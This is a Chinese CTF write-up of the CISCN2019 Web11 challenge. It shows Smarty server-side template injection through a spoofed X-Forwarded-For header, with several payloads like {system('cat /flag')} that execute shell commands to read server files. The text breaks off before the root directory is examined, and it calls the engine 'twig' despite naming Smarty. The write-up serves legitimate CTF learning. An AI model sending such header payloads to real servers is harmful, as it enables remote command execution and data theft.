[PHP知识库] [CISCN2019 华东南赛区]Web11

开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> PHP知识库 -> [CISCN2019 华东南赛区]Web11 -> 正文阅读

[PHP知识库][CISCN2019 华东南赛区]Web11

打开环境：

?发现Build With Smarty !说明应该是与ssti模板注入有关。

?发现xff,还有右上角的Current IP:139.205.239.33，就尝试伪造一下IP：

?成功伪造，那就看看xff这个地方有无ssti注入漏洞：

? 服务端模板注入攻击

?说明存在ssti注入漏洞，且为twig类型，我们试试能不能命令执行：

?成功执行了，那就简单了，当前目录下有

api
css
index.php
smarty
templates_c
xff
xff

分别读取：X-Forwarded-For:{system(‘cat /api’)}
X-Forwarded-For:{system(‘cat /css’)}
X-Forwarded-For:{system(‘cat /index.php’)}
X-Forwarded-For:{system(‘cat /smarty’)}
X-Forwarded-For:{system(‘cat /templates_c’)}
X-Forwarded-For:{system(‘cat /xff’)}
X-Forwarded-For:{system(‘cat /flag’)}
X-Forwarded-For:{system(‘cat /flag.php’)}

都没发现内容，那就看看根目录：